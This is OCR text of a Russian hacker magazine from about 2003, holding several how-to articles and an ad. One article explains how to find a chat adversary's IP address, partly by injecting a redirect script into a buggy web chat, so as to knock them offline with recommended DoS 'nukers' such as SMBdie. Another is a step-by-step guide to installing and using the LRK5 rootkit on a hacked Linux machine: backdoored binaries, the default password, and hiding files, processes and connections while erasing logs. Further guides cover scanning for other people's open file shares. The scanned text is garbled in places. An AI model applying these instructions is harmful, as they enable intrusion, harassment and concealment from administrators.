му, когда на почту журнала очерес- 
ной раз приходит письмо с вопро- 
сом: «Как узнать IP ламера в ча- 
те?», по всей редакции раздается 
скрежет зубовный. Ну нельзя прос- 
то так ни с того, ни с сего взять и 
узнать 1Р'шник в веб-чате, каким бы 
ламоботом ни был его обладатель! 

Естественно, чтобы наказать ка- 
кого-нибудь дятла (а он дятел, если 
против него канает нюкер), нужно 
знать его IP либо сетевое имя. Что- 
бы закормить вражескую тачку 
дерьмом go полусмерти, нужно это 
дерьмо на нее отправить, а чтобы 
отправить, нужно надписать на 
конверте адресок. Грубо говоря, 
IP'LUHUK и есть этот адресок. Все, 
как на почтамте! В локалке недруга 
можно найти по сетевому имени, 
которое легко резолвится в IP стан- 
дартными средствами Винды, нап- 
ример ping’om. 


ЗАЛЕЖИ IP"WHKKOB 

Так, где и как можно нарыть IP бу- 
дущей жертвы аборта? Разберемся 
во всем по порядку. 

Тема первая. Вот ты поссорился с 
каким-то хреном во дворе (читай в 
веб-чате или в конфе) и решил отп- 
равить ему дерьма по почте (нюк- 
нуть), но его адреса (IP) ты, естест- 
венно, не знаешь (ты же этого чела 
в первый раз видишь!). Ты только 
знаешь адрес двора (веб-чата). 
Дворник знает и твой адрес, и ag- 
рес твоего недруга (такая уж у него 
работа), но ни тебе, ни ему он адре- 
са говорить не обязан и не скажет 
(он злой). Можно, просто спросить 
самого чувака. Я бы не ответил :). 
Можно завалить дворника, то есть 
сервак (А вам слабо?), тогда ты бу- 
дешь знать адреса всех перцев, ко- 
торые ходят в этот двор. А иногда 
дворники бывают алкоголиками 
(памо-программер забыл включить 


в код веб-чата функцию, которая 
фильтрует теги), и можно подсу- 
нуть ему водки (небольшой скрип- 
тик). Пьяный дворник либо сам вы- 
даст тебе все адреса, либо схватит 
нашего хренка за ухо и заставит 
его сказать тебе адрес. Действи- 
тельно, если послать врагу в глюч- 
ном веб-чате в качестве мессаги 
скрипт, который редиректит брау- 
зер на твою страничку, то хитрая 
саГшка у тебя на паге легко выце- 
пит IP недруга из переменных окру- 
жения и замылит тебе на почту. 
Расстраивает одно: глючных веб- 
чатов становится все меньше и 
меньше. Так что придется рыть go- 
полнительную инфу. 

Тема вторая. Чувак из чата имел 
неосторожность оставить инфу о 
себе, где дал свою аську. Аська - 
это такая песочница, заходя в кото- 
рую, все пишут свой адрес в ма- 
ленькую секретную книжечку, что- 
бы их могли найти друзья, но пос- 
кольку книжечку эту никто не охра- 
няет (аськи протокол жутко дыря- 
вый), можно выцепить IP абсолют- 
но без напряга. Если пользуешь 
родной 1СО-клиент, тогда скачай се- 
бе UIN2IP. Эта софтина покажет те- 
бе IP юзверя из Аси. Miranda вооб- 
ще умеет показывать IP по дефол- 
ту, причем как внешний (для ине- 
та), так и внутренний (если чувак 
через локалку в инет выходит). 

Тема третья. Ты поссорился с чу- 
ваком не в веб-чате, а в IRC. Ирка - 


Вот где лежит [Р'шник в Mupange. 


это такое место, где все при входе 
должны записать свой адрес в 
большую общедоступную книгу, 
чтобы никто не смог безобразни- 
чать анонимно, то есть в IRC есть 
специальный whois сервис. Поэто- 
му достаточно шлепнуть по нику 
вражины правой пимпой крысы и 
выбрать пункт whois (что 3a?!.), как 
в окне статуса появится 1Р'шник че- 
ла и хост, с которого он пришел. 


Пинганули по сетевому имени - увидели IP. 


Однако надо учитывать, что вражи- 
на мог спрятаться за спиной gpyro- 
го чела аКа анонимного прокси сер- 
вера (ему по cpury, у него брат - Ka- 
чок) и записаться под чужим IP, 
тогда дело - дрянь. 

Тема четвертая. Открываешь ты 
дверь, а за ней дерьма немеряно. 
Кто его прислал? Берешь пакет и 
читаешь адрес отправителя, там 
все написано. На компе этим зани- 
мается фаервол, который режет па- 
кеты с дерьмом и списывает с них 
IP в логи. Если ты застал процесс 
доставки дерьма к двери, то есть 
обнаружил, что тебя нючат, то за- 
пускай из консоли netstat (прямо 
так и пиши), и увидишь все соеди- 
нения с твоей тачкой с 1Р'шниками. 

Тема пятая. Если твой вражина - 
бомж аКа дайлапщик, то у него есть 
только временный адрес (динами- 
ческий IP), куда ты можешь слать 
пакеты с дерьмом. Но если недруг 
живет с тобой в одном подъезде 
aka локалке, но ты не знаешь, где 
точно, то достаточно просканить 
сетку на наличие шаров, и, возмож- 


Кто-то к нам подшарился... 


но, найденные сетевые тачки и их 
имена помогут тебе выяснить, кто 
из них - твой нелюбимец. Превра- 
тить сетевое имя в IP, как я уже 
сказал, можно стандартной коман- 
дой из консоли: ping urod. Узнать 
сетевое имя по IP можно, если наб- 
рать в командной строке: net view 
\\IP-agpec. Правда, если у юзера не 
установлен NetBIOS, тогда ты обло- 
маешься. 

Тема шестая. Ты выяснил, что у 
твоего врага есть сайтец, который 


НОМИТО/ПОТРЯСЛИ, ПОТОМ ПО БИЛЛИ... 


он разместил на своей домашней 
тачке для друзей, и для этого при- 
купил себе статичный IP, то доста- 
точно перегнать url в IP любой про- 
гой, которая умеет пользоваться 
whois сервисом. Например, с no- 
мощью известной проги Shadow 
Scaner, которая вообще много чего 
при желании тебе покажет, об ата- 
куемом хосте. Так же можно узнать 
IP введя имя сайта, например, на 
сервере www.ripe.net. 


ЗЛОБНЫЙ СТРУМЕНТ 

Вот у тебя и есть вся необходимая 
инфа. Теперь осталось выбрать 
софт. Я рекомендую скачать все 
эти проги - ведь никогда не знаешь 
с чем тебе придется столкнуться. 


Hacksoft Nuke (IGMP) 
Качать: hacksoft.ru 

Размер: 490 Кб 
Распространяется: Егеемаге 


Первым номером нашей програм- 
мы выступает прога Hacksoft Nuke. 
Очень простой инструмент, нап- 
рочь роняющий 98-й Мастдай и, 
возможно и 95-й (если откопаешь 
где-то этого динозавра, конечно), 
посредством посылки ему IGMP па- 


Hacksoft nuke: просто добавь Ip! 


кетов и забивания канала. 98-й вы- 
дает при этом синий экран смерти, 
который, в общем, не вызывает за- 
висания всей системы, но вот кон- 
нект теряется, пока атакуемая ма- 
шина не будет перезапущена. На 
ХР с $Р1 никакого деструктивного 
эффекта не было замечено, кроме 
кратковременных замедлений свя- 
зи (что проверялось посылкой 
ping’a с атакуемой машины на ата- 
кующую). В общем, юзверю, сидя- 
щему под МТ-евыми эта прога нав- 
редить не сможет. 

Тулза позволяет выставлять дли- 
тельность атаки, размер IGMP-nake- 
та и периодичность. Для атаки goc- 
таточно знать только IP адрес. От- 
личный инструмент, если надо отп- 
равить в даун пользователя 9х 
Форточек. 


Voidozer 

Качать: sequritylab.ru 
Размер 700 Кб 
Распространяется: Freeware 


Следующий экземпляр в нашей 
лаборатории - это Voidozer. Ста- 
ренькая программка, работающая в 
командной строке. Делает пример- 


Voidozer: консольный, но прикольный. 


но то же самое, что и предыдущая. 
Все, что нужно указать, - это IP или 
имя хоста, и сколько раз послать 
пакет. Остальное прога сделает са- 
ма. Как и предыдущая софтина, она 
способна уронить только Винды 9х, 
а МТ-евые к ней абсолютно равно- 
душны. Можно, еще немного поф- 
лудить канал. На сегодняшний 
день, конечно, пользы от нее не 
много, но все равно попробуй - мо- 
жет, именно она тебе и поможет. 


SMB die 

Качать: www.nmrc.org/InfoAnarchy/ 
InfoAnarchy.htm 

Размер: 400 Кб 

Распространяется: Егеемаге 


Это орудие посерьезней. Оно нап- 
равлено уже как раз на пользовате- 
лей всех разновидностей МТ-тевых, 
включая как сам МТ, так 2000 и ХР. 
Для атаки тебе потребуется, как 
обычно, [Р и сетевое имя тачки. Прога 
действует с помощью службы управ- 
ления WMI и сформирует и посылает 
тачке на 139-й порт специально сфор- 
мированный SMB-3anpoc, который ее 
и поражает. Но тут есть небольшой 
обпомчик: если у юзверя установле- 
ны последние сервиспаки и обновле- 


SMBdie великий и ужасный. 


ния, то вряд ли получится завалить 
его этим инструментом. Также обло- 
маешься, если у него не установлена 
служба WMI, которая, например в ХР 
ставится по умолчанию, но ничто не 
мешает ее удалить. После установки 
$Р1, служба WMI также становится 
отключенной. Машина с ХР без пер- 
вого сервиспака и без фаервола вы- 
дала синий экран и перезагрузилась 
при нашем лабораторном экспери- 
менте. Так что если не хочешь, чтобы 
тебя так поимели, ставь последние 
обновления, сервиспаки и фаервол, и 
будет тебе счастье. 


Ну вот, для начала изучения сете- 
вых протоколов на практике тебе 
хватит. А дальше читать, читать и 
еще раз читать. 


Ce 
Bi | 
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Miranda Bo- 
обще умеет 
показывать 
IP по де- 
фолту. 


Когда на поч- 
ту журнала 
очередной раз 
приходит 
письмо с воп- 
росом: «Как 
узнать IP ла- 
мера в ча- 
Te?»), по всей 
редакции раз- 
дается скре- 
жет зубов- 
ный. 


уэечу 950 
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LINUX ROOT KIT 


О TOM, КАК УСТАНОВИТЬ И ЗАЮЗАТЬ LRK5S 
НА ВСЮ КАТУШКУ 


[ElviS] (elvis@sgroup.ru) 


Руткит LRKS 
писался nog 
ядро 2.X, так 
что не 
выпучивай 
глаза и не 
обвиняй меня 
и создателя 
руткита в том, 
что он у тебя 
не работает 
под старой 
осью. 


Какие бывают руткиты, ты знаешь. Знаешь, под какую OCb какой и прочую общую 


инфу, но все-таки тебе хочется прочитать руководство по установке самого супер- 


пупер офигенного руткита, чтобы не загружаться доками, ридмишками и прочей 
байдой. Поэтому в этом НОМТО ты найдешь подробное руководство по установке и 
использованию Linux Root Kit 5 (LRK5). 


ля начала ознакомим- 
ся с комплектом... 


КИШКИ LINUX ROOT KIT’A 

Вот какие тулзы/бэкдоры включает 
в себя Linux Root Kit: 

bindshell port/shell daemon! 


chfn Trojaned! Дает юзеру npa- 
ва рута. 

chsh Trojaned! Дает юзеру npa- 
ва рута. 

crontab Trojaned! Прячет нежела- 
тельные "следы" в кроне. 

du Trojaned! Прячет файлы. 

find Trojaned! Прячет файлы. 

fix Заменяет файлы на про- 
бэкдоренные. 

ifconfig Trojaned! Прячет сниф- 
cep. 

inetd Trojaned! Дает удаленный 
доступ. 

killall Trojaned! Не дает убить 
процесс Х (икс), с по- 
мощью Killall. 

Ипзп ег Сниффер, просто сниф- 
фер. 

login Trojaned! Позволяет хаке- 
ру погиниться под любым 
юзером, используя па- 
роль к руткиту и обыкно- 
венный login. 

Is Trojaned! Прячет файлы. 

netstat Trojaned! Прячет подклю- 
чения. 

passwd Trojaned! Дает юзеру npa- 
ва рута. 

pidof Trojaned! Прячет процес- 
сы. 

ps Trojaned! Прячет процес- 
сы. 

rshd Trojaned! Дает хакеру 
доступ рута через rsh. 

sniffchk  Тулза, проверяющая pa- 
ботоспособность сниф- 
фера и его логи. 

syslogd Trojaned! Стирает следы в 
логах. 

tcpd Trojaned! Прячет соедине- 
НИЯ. 

фор Trojaned! Прячет процес- 
сы. 

wted wtmp/utmp редактор. 

72 Zap2 utmp/wtmp/lastlog 
клинер. 


me 


== 
Li | 07(32) 2003 


YCTAHOBKA 

Поговорим об установке этой заме- 
чательной программы на хакнутый 
комп. Первое, что тебе придется 
сделать, - это залить архив с рутки- 
том и распаковать его. Предполо- 
жим, что ты уже это сделал, так как 
это типичные действия, которые ты 
уже должен знать. Установка рут- 
кита предельно проста. Если ты хо- 
чешь установить LRK в стандарт- 
ном режиме, то достаточно выпол- 
нить ‘make all install’. Если же в Te- 
невом, то ‘make shadow install’. 
Пароли и прочая бодяга устанавли- 
вается в rootkit.h. Вот что там нахо- 
дится и зачем это нужно: 
ROOTKIT_PASSWORD - пароль на 
руткита, соединения и прочую бо- 
дягу, где нужен пароль-икс. 
ROOTKIT_******_FILE можешь за- 
менить на произвольные имена, но 
так, чтобы они не очень бросались 
в Глаза. Желательно, чтобы эти 
файлы были в dev, так как там туе- 
ва хуча файлов, и черт ногу сло- 
мит в поисках, где там что :). Осо- 
бенно много файлов типа 
/dev/pt***, поэтому по дефолту и 
стоят именно такие имена. Мо- 
жешь их даже не изменять, но ес- 
ли тебе попадется умный админ, 
который любит все делать своими 
руками, а не с помощью спецпрог- 
рамм aka руткит-финдеров, то луч- 
ше все-таки запариться с именами. 
Зная стандартные файлы руткита, 
админ легко сделает, к примеру, 
cat /dev/ptys (по дефолту это nor 
руткита). 

Если ты планируешь троянить крон, 
то можешь изменить и ТАВ_МАМЕ, 
но крон по умолчанию не патчится, 
и протроянивать его надо своими 
хэндами, проапгрейженными gO 
состояния “очумелые ручки". Меж- 
ду прочим, троян для крона работа- 
ет только в Linux RedHat и Linux 
Slackware. 


БАГИ 

Должен предупредить тебя, что во 
время установки и конфигурации 
(configure) могут возникнуть опреде- 
ленные баги, как, например, у меня с 


дистрибутивом, взятым с ftp.uinc.ru. 
Пришлось немного покопаться в ис- 
ходниках. Но что там надо менять, 
добавлять, удалять - это отдельный 
разговор, и посвятить тебя в тонкос- 
ти языка С++ и зВе!'а мне не удастся 
в одной статье. Если трудности воз- 
никнут, попробуй обратиться ко мне 
на е-тай; если не буду сильно занят, 
то обязательно отвечу тебе на все 
вопросы, касающиеся этой статьи. У 
меня баг возник при компиляции 
sniffchk и самого линснифеера, так 
что первым делом попробуй просто 
убрать их из Makefile. Bce? Установ- 
ка прошла успешно? Молодец, приг- 
лашаю тебя в Кремль! Ну, установил 
ты эту штукенцию, а дальше что? А 
дальше лес... река... поле... :) Юзать 
его дальше надо! Как? Ну, так и 
быть, расскажу. 


БЕРЕМ КОНТРОЛЬ! 

Итак, сейчас ты узнаешь, для чего 
служит и как используется каждая 
тулза из пакета. 

chfn - позволяет юзеру получить 
права рута. Работает так: запускай 
chfn, а когда он попросит тебя 
ввести новое имя, смело вводи па- 
роль к руткиту - взамен получишь 
рута :). 

chsh - эта штуковина работает ана- 
логично chfn, только здесь тебе по- 
надобится ввести вместо имени 


Бэкдор chfn в действии 


шелла пароль к руткиту, кстати, по 
умолчанию OH Satori и задается в 
rootkit.h. Выглядит это так: 


[test@unk-host test]$ chsh 
Changing shell for test. 


HOWTO/LINUX ROOT KIT 


a, 


Z 


Password: password_for_user_test (пароль 
пользователя, HE руткита) 

New shell [/bin/bash]: lepricon 
[root@elvis-net test]# 


ПРЯЧЕМСЯ! 

Is - позволяет прятать Х(икс) фай- 
лы. Список файлов, которые надо 
прятать, задаются в текстовике, ко- 
торый ты указываешь в параметре 
ROOTKIT_FILES_FILE в rootkit.h, no 
умолчанию этот файл /dev/ptyr. 
Также можно сделать так, чтобы 
эти файлы можно было просматри- 
вать со специальным флагом “Is - 
/". Чтобы разрешить его использо- 
вание, вместо “#undef SHOWFLAG” 
в rootkit.h напишите “#define 
SHOWFLAG" (это надо делать go 
компиляции и установки). Файл 
ROOTKIT_FILES_FILE (/dev/ptyr по 
дефолту) имеет такой вид: 


x-filel 
bleva.tar.gz 
hacked.tar.gz 
„Агепуа 
directory-1 


То есть это просто перечень фай- 
лов, которые надо прятать. Есть 
один недостаток: если ты назовешь 
свой файл passwd, то все файлы 
passwd, даже /etc/passwd, не будут 
выводиться на экран по команде Is. 
Так что выбирай оригинальные 
имена файлов и дир. Регистр ИМЕ- 


ЕТ значение, то есть, если ты впи- 
шешь в ROOTKIT_FILES_FILE gu- 
ректорию FiLeZ, то диры filez, НЕЙ, 
FILEZ и т.д. скрываться не будут, то 
же самое относится и к файлам. 
Добавлять и удалять файлы из 
ROOTKIT_FILES_FILE можно без пе- 
рекомпиляции руткита. 
Пробэкдоренные сервисы типа du 
find работают аналогично. 

netstat - патчится gO состояния, в 
котором он не показывает tcp/udp 
соединения и открытые порты. То, 
что надо скрывать, задается в текс- 
товике, который указывается в 
rootkit.h в параметре 
ROOTKIT_ADDRESS_FILE, по умол- 
чанию этот параметр равен 
/dev/ptyg. Есть три типа парамет- 
ров скрытия, которые ты можешь 
задать в ROOTKIT_ADDRESS_ FILE. 
Вот они: 


тип 0: прячет uid 

тип 1: прячет локальный адрес 
тип 2: прячет удаленный адрес 
тип 3: прячет локальный порт 

тип 4: прячет удаленный порт 

тип 5: прячет порты 


Примерное содержание файла 
ВООТКТ_АООКЕ$$_ЕШЕ вот такое 
(пояснений, естественно, в самом 
файле нет): 


О 1337 - прячет все соединения 
пользователя с юидом 1337. 


Вот так работает пробэкдоренный Is 


“Прошитый” passwd в действии 


1 194.84 - прячет все локальные 
соединения с ip 194.84.ХХХ.ХХХ. 
2 194.84.8.1 - прячет все удален- 
ные соединения Ha ip 194.84.8.1. 
3 3355 - прячет локальные соеди- 
нения с портом 3355. 
4 6667 - прячет все удаленные 
соединения на порт 6667 (ircd). 
5 .ircd - прячет все ircd сокеты 
на хакнутой тачке. 


passwd - эта программа (сервис) в 
протрояненном виде даст тебе пра- 
ва рута. Для этого нужно всего 
лишь знать пароль на руткит, кото- 
рый у тебя задан в rootkit.h. Когда 
программа попросит тебя ввести 
свой старый пользовательский па- 
роль, забей вместо него пароль на 
Irk -> Wellcome root ;). 


ХРЕН ТЫ HAC ЗАМОЧИШЬ! 
Пропатченный КШай не позволит 
убить процессы, перечисленные в 
текстовике, который указывается 
в параметре 
ROOTKIT_PROCESS FILE в rootkit.h 
с помощью команды killall. Стоит 
заметить, что эти файлы не в си- 
лах убить даже суперюзер aka 
root. Есть два типа параметров, 
которые можно заносить в 
ROOTKIT_PROCESS_FILE (no умол- 
чанию это /dev/ptyp). Первый тип 
- это точное название процесса, 
которое должно полностью соот- 
ветствовать процессу, kill которо- 
го нельзя допустить. Например, в 
ВООТКИ_РКОСЕ$$_ЕШЕ ты мо- 
жешь указать процесс lamprocess. 
Если рут сделает killall lamprocess, 
то процесс не кильнется, если же 
в процессах есть lamprocess2, то 
по команде Killall lamprocess2 он 
успешно свернется. 


Второй тип - это шаблон. Если та- 
кое сочетание символов встреча- 
ется в названии одного или нес- 
кольких процессов, то с помощью 
killall ero (их) тоже убить нельзя. 
К примеру, если ты указал шаб- 
лон hack, то процессы hack. 
Superhack, yhackx и т.д. убить kil- 
1а!’ом не получится. Но не забы- 
вай, что регистр символов имеет 
значение. 

ps - аналогично КШа! и pidoff ис- 
пользует ROOTKIT_PROCESS_FILE. 
Скрывает процессы, терминалы, 
процессы с определенным именем, 
процессы определенного пользо- 
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ссылка: 
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ИНТЕРНЕТ-МАГАЗИН 
С ДОСТАВКОЙ HA ДОМ 


. ЗЛО 


http://www.e-shop.ru 


Процессор: Intel Pentium-3 733 Mhz 

Графический процессор: 

nVidia XGPU 233 Mhz 

Производительность: 125 Млн пол./сек 

Память: 64 Mb 200 Mhz DDR 

Звук: nVidia MCPX 200 Mhz, | 

256 каналов, Dolby Digital 5.1 : * =f 
Прочее: 2-5x DVD-drive, жесткий диск 8 Gb, = т = : 
4xUSB-nopta, сетевая плата 100 MBps Star Wars: азия во Castle 


Knights of the Wolfenstein: 
Воспроизведение О\/О-фильмов Old Republic Tides of War 


Enter the Matrix Tao Feng: APEX Brute Force 
Fist of the Lotus 
Заказы по интернету — 
круглосуточно! 
‘ma С ).rU 
Заказы по телефону 
можно сделать 


СУПЕРПРЕДЛОЖЕНИЕ ДЛЯ 
ИНОГОРОДНИХ ПОКУПАТЕЛЕ 
стоимость доставки 
снижена на 10%! 


Dead or Alive 
House of the Dead 3 Xtreme Beach 
c Mad Catz Blaster Volleyball 


* — цена Ha американскую версию игры (NTSC) 
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ДА! Я ХОЧУ ПОЛУЧАТЬ БЕСПЛАТНЫЙ 
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КАТАЛОГ X-BOX xBox 


песо О ‚хо. ООО 
УЛИЦА дом — | corres = 


ФИО 


ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-ЗНОР 


вателя и т.д. Вот примерное содержание файла 
ВООТКИ_РКОСЕ$З$_ЕЩЕ: 


О - прячет все процессы пользователя с uid'oM 0, то есть ру- 
та (uid можешь поставить любой). 

1 Ку? - скрывает терминал tty2. 

2 hackprog - скрывает все процессы с названием hackprog. 

3 hack - скрывает все процессы, в которых содержится слово 
hack, например, hacksoft, thehackd, hackdaemon (регистр 
имеет значение). 


Еще раз повторюсь, не оставляй комментариев в файлах 
ROOTKIT_XXX_FILE, я пишу их тебе просто для разъяснения. 
И не оставляй пробелов после названий файлов и процес- 
сов. Текстовики, прописанные ROOTKIT_XXX_FILE, должны 
выглядеть так: 


Где vataX, нужный файл, процесс, папка, порт, терминал и т.д. 


РУЛИМ! 
rshd - позволяет выполнять удаленные команды через rshd. 
Для этого надо знать пароль на руткит. Использование: 


AICP AaSSV q nost comma 


Пример: 


ber wenackedtnis.co оте/хакерлгсалгса -p 666 


Это запустит ircd Ha 6667 порту, если он существует в ука- 
занной директории. 


ПОДТИРАЕМ ЛОГИ 

sshd - теперь он стал круче! Если ты заходишь под логином 
rewt и используешь пароль на руткит, то логи не ведутся, а 
если ты заходишь через обыкновенного юзера, то поги ве- 
дутся как и прежде. 

syslogd - стирает логи, в которых присутствуют сло- 
Ba/ip/sockets/qpa3bl, указанные в ROOTKIT_LOG_FILE, кото- 
рый задается в rootkit.h. Вот примерный вид файла ROOTK- 
IT_LOG_FILE. Заметь, что это единственный файл, где НЕ Ha- 
gO проставлять цифры (типы) перед тем, что надо скрыть. Тут 
все однотипное: 


При таком содержании файла будут стираться/не писаться 
логи записи, в которых встречаются сочетания символов 
elvis-host.org, 194.84.8.1 и rshd. 

tcpd - разрешает доступ с определенного хоста, заданного в 
фале, который указывается в параметре 
ROOTKIT_ADDRESS_FILE файла rootkit.h (во как мудрено выс- 
казался :)), без всякого ведения логов. Примерное содержа- 
ние фала ROOTKIT_ADDRESS_FILE: 


Это позволит юзерам, подконнектившимся с ip 194.84.8.1 и 
10.4.0.1, залогиниться в систему без соответствующих запи- 
сей в логах. 


top - идентично ps. 
72 - Zapper, эта программа позволяет стирать 
utmp/wtmp/lastlog пункты с определенным username’om. 


Ну как, научился? Не стоит благодарностей! Лучше валю- 
той :)! На этом HOWTO подходит к концу. Спасибо за внима- 
ние, следи за обновлениями руткитов. Желаю удачи! 


ЭНАВЕ’"МСЯ 
С ПИНГВИНАМИ 


КАК НАЙТИ И ЗАЮЗАТЬ РАСШАРЕННЫЕ 
РЕСУРСЫ ИЗ-ПОД LINUX. 


Ушаков Андрей aka A-nd-Y 
(Andy_@timus.ru) 


ак ты знаешь, издав- 

на в винде практику- 

ется такое дело, как 
доступные ресурсы (они же расша- 
ренные ресурсы), с помощью кото- 
рых виндовс юзеры могут без труда 
посредствам explorer’a использо- 
вать файлы и принтеры через сеть, 
так же, как будто бы они находятся 
на их собственном компьютере. 


КТО ТАКАЯ САМБА? 

На правильной оси за шары отвеча- 
ет файловый сервис Samba, кото- 
рый позволяет пользователям Ли- 
нукс взаимодействовать с виндовы- 
ми машинами по протоколу NetBIOS. 
Samba без труда позволяет открыть 
доступ для пользователей Windows 
к определенным директориям систе- 
мы, разрешить совместное исполь- 
зование принтера Ha Bunge и Лину- 
хе, а также включает клиента, кото- 
рый позволяет производить доступ 
к открытым ресурсам других машин, 
в том числе и виндовых. 

Для тебя, кул хакер, расшаренные 
ресурсы будут полезны не только 
гигзами варезных филесов, валяю- 
щихся в локалке, но и возмож- 
ностью опробовать очередной ню- 
кер, ведь 139-й порт еще никто не 
отменял, а для работы по протоко- 
ny NetBIOS он должен быть открыт. 


DJ, ПОСТАВЬ CAMBY! 
Естественно, прежде чем что-то 
делать с расшаренными ресурсами 
тебе нужно их найти. В поставке 
Samba есть утилита findsmb, 06 ис- 
пользовании которой я тебе ко- 
ротко расскажу. Но у тебя уже 


Сканим шарез с помощью findsmb. 


HOWTO/SHARE'MCA С ПИНГВИНАМ 


должна стоять сама Samba, либо 
придется ее установить. 

Сначала нужно качнуть исходники 
Samba (http://usl.samba.org/samba/ 
samba.html), и проинсталлировать 
их. Инсталляция абсолютно станда- 
ртная: раскрывай архив и переходи 


во вложенную директорию source. http://www. 
Далее пускаешь скрипт ./configure, opennet.ru - 
make, make install. Если у тебя воз- ee iG ee ВЕНЕ вши немало 
никнут вопросы в ходе установки, информации 
ss a no cam6e. 
читай идущий в архиве README. лючение к удаленному хосту. В 
После установки тебе нужно будет этом нам поможет Smbclient. Запус- 
привести Samba в рабочее состоя- кается из той же директории, что и 
ние, создав файл конфигурации findsmb. 
smb.conf (по умолчанию должен Ha- Smbclient позволяет манипулиро- 
ходиться по адресу /usr/local/ вать файлами расшаренного ресур- 
samba/lib/smb.conf). Создание са. Работает он аналогично кон- 
файла со всеми параметрами хоро- сольному Ир-клиенту. Использова- 
шо описано в SMB-HOWTO ние smbclien не составит для тебя 
(http://www.linux.org.ru/books/HOWT — труда. Просмотр доступных ресур- 
O/SMB-HOWTO.html) и в весьма неп- сов осуществляется следующим 
лохом руководстве по настройке ли- образом: 
нукс сервера (http://tcb.spb.ru/ smbclient -L COMPUTER_NAME 
other/docum/linuxsos/ch21_1.html). Здесь опция -L задает хост маши- 
ны, ресурсы на которой ты хочешь 
ШАРИМ В ПОТЕМКАХ посмотреть. Если доступные ресур- 
Итак, Samba мы поставили, сейчас сы там есть, их имена будут пере- 
можно и посканить, что есть инте- числены в отдельном столбце. Что- 
ресного в локалке, на предмет рас- бы подключиться к нужному ресур- 
шаренных ресурсов. Как я говорил, cy используй следующий формат 
в самбу входит утилита findsmb, ко- команды smbclient: 
торая позволяет искать расшарен- smbclient р 
ные ресурсы в сети. Запуск прог- //COMPUTER_NAME/RESOURCE_NAME -U PP 
раммы осуществляется командой: USER_NAME на расшарен- 
/usr/local/samba/bin/findsmb Здесь после двойного слеша идет ие 
По умолчанию, если стартанули имя машины, и имя ресурса, к кото- сеть или сис- 
прогу без параметров, то произво- рому ты подключаешься. После тему, поэто- 
дится сканирование твоей подсети. — запроса на соединение и прохожде- и, 
Чтобы производить сканирование в ния авторизации, ты сможешь ра- защите. 
любой выбранной сети, Findsmb ботать с файлами также, как через 
можно задать параметр - бродкаст консольный Нр-клиент. 
адрес подсети. Чтобы узнать доступные команды, 
Найденные ресурсы выводятся в в строке клиента набери «help» nu- 
виде таблицы в три столбца: |Р - ад- 60 «?». 
рес машины, ее NetBIOS имя, а так- Ну вот, я вкратце рассказал тебе 


же столбец, в который выводиться о том, как ты можешь работать с 
информация о рабочей группе уда- ° расшаренными ресурсами из-под 
ленной машины, операционной сис- твоей любимой оси. Возможностей 


теме и версии файлового сервиса. у самбы еще очень много, если хо- 
чешь их изучить, покапайся в ма- 
ЦЕПЛЯЕМСЯ нах, да и в интернете документации 
После того, как ресурсы найдены, по этому вопросу достаточно. 
можно попытаться выполнить подк- ae 
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Список 
диапазонов IP 
разных 
провайдеров 
легко нарыть 
в Инете, а еще 
можно 
натравить 
whois на сайт 
прова - сразу 
получишь 
нужную инфу. 
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В этом номере мы еще поговорим о сканерах расшаренных ресурсов под Вынь, с 


помощью которых ты можешь найти и получить доступ к чужим винчестерам. Ты 
можешь выбирать любой из них, так как любая из этих программ справится с 
поставленной задачей, были бы руки на нужном месте. 


же по-прежнему 
продолжаю 
использовать Legion, 
потому что... ну, привык я к нему, и 
все. Так что далее я все буду 
объяснять на примере этой проги. 
Итак, у нас имеется некая сеть 
или даже обычное диал-ап соеди- 
нение, и тебе ужас как надо проска- 
нировать диапазон на наличие от- 
крытых для общего доступа хардов. 
Я не буду разбираться, зачем тебе 
это понадобилось (может, ты за- 
бывчивый админ :)). Также я не бу- 
gy еще раз напоминать, что это не- 
хорошее занятие, - это работа дя- 
дек в погонах. Мое дело всего 
лишь объяснить тебе исклю- 
чительно в целях повышения обо- 
роноспособности страны теорию. 


ЧЕКАП ПЕРЕД СТАРТАП! 
Прежде чем перейдем к делу, 
убедись, настроена ли твоя тачка 
на протокол Ме ВЕЧ| - как известно, 
именно он используется для 
работы с общими ресурсами. Для 
этого открой свойства своего 
подключения, через которое ты 
будешь сканировать. Для Windows 
2000/ХР эти настройки находятся 
во вкладке “сеть” окна свойств 
подключения. Проверь, есть ли там 
следующие пункты: “NWLink 
IPX/SPX/NetBIOS - совместимый 
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Все системы готовы к скану 


транспортный протокол”, “NWLink 
NetBIOS", “Служба доступа к 
файлам и принтерам сетей 
Microsoft” и “Клиент для сетей 
Microsoft”. Если нет, нажми 
“Установить” и установи, 
соответственно, клиент, службу и 
протокол. После этого может 
потребоваться перезагрузка. 

Если у тебя Windows 9x, то все 
делается примерно так же, только 
называется несколько иначе. Там 
должны быть установлены 
протокол NetBEUI, служба доступа 
к файлам и принтерам и клиент для 
сетей Microsoft. 

Когда все эти действия будут 
произведены, твой комп будет 
полностью готов к бою... за права 
потребителей :). Осталось только 
скачать и запустить Legion. 


АДРЕСОК НЕ ДАШЬ? 
Сканировать ты можешь как локал- 
ку, так и через диал-ап соединение, 
то есть абсолютно все машины, 
находящиеся с тобой в одной сети. 
Разумеется, через диал-ап 
скорость будет не самая лучшая, да 
и не покачаешь с найденного диска 
ничего крупногабаритного, 
особенно у таких же диал-апщиков. 
Зато если это локалка или 
выделенка, да еще и трафик 
халявный, тогда все просто супер! 
Первое, что нужно указать в 
настройках Legion, - это скорость 


твоего соединения. Если у тебя 
модем, то в none Connection Speed 
ставь скорость, с которой твое 
соединение работает, то есть 
Slower (меньше чем 28.800), 28, 
56. Ну а если у тебя сеть или 
выделенка, ставь, соответственно, 
Faster. При этом сканирование 
пойдет довольно быстро: меньше 
чем за минуту можно умудриться 
просканировать адресное 
пространство от O go 255. Далее 
ставь в поле Scan Туре опцию Scan 
Range, что позволит сканировать 
тебе диапазон адресов. 

Теперь определимся с !Р-адресами. 
Если ты в локалке, то, скорее всего, 
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должен знать, какие 1Р-адреса в ней 
используются, и, соответственно, в 
поле Scan Range задавай в качестве 
Start IP тот адрес, с которого 
начнешь сканирование (для 
полноты поиска задавай что-то типа 
XXX.XXX.0.1), а в качестве End IP - 
адрес, которым закончишь (что-то 
вроде ххх.ххх.255.255). Это, 
конечно, очень большой диапазон 
адресов, и если у тебя диал-ап, не 
рассчитывай быстро добраться до 
сладкого. В этом случае лучше 
вообще сканируй понемногу, 
небольшими сегментами. Также, 
используя этот метод скана, ты, хотя 
и не сильно, но все же уменьшаешь 
